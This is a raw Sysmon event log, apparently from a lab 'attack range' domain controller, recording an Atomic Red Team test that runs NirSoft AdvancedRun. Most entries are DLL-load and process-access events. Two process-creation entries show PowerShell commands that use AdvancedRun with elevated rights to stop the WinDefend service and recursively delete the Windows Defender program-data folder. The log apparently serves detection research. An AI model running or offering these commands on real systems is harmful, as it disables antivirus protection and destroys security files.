734700x80000000000000003967151Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.191{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967150Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.191{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967149Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.191{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967148Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.191{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967147Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.191{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967146Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.191{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967145Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.191{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® 
Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967144Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.191{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967143Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.191{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967142Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.191{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967141Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.191{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967140Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.191{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967139Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.191{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967138Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.191{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967137Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.191{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 734700x80000000000000003967136Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.191{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003967135Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.191{834264DD-DAF8-61EA-5B00-000000002702}41004280C:\Windows\system32\csrss.exe{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003967134Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.191{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003967133Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.175{834264DD-F281-61EA-1E04-000000002702}10281352C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11ATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000003967132Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.189{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory /RunAs 8 /RunC:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-F281-61EA-1E04-000000002702}1028C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} ATTACKRANGE\Administrator 734700x80000000000000003967131Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.175{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967130Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.175{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967129Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.175{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967128Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.175{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967127Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.175{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967126Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.175{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967125Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.175{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967124Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.175{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967123Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.175{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967122Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.175{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000003967121Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.175{834264DD-DAF8-61EA-5B00-000000002702}41004116C:\Windows\system32\csrss.exe{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003967120Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.175{834264DD-F281-61EA-1E04-000000002702}10281352C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a
459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11ATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000003967119Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.176{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe" /EXEFilename C:\Windows\System32\sc.exe /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory /RunAs 8 
/RunC:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-F281-61EA-1E04-000000002702}1028C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} ATTACKRANGE\Administrator 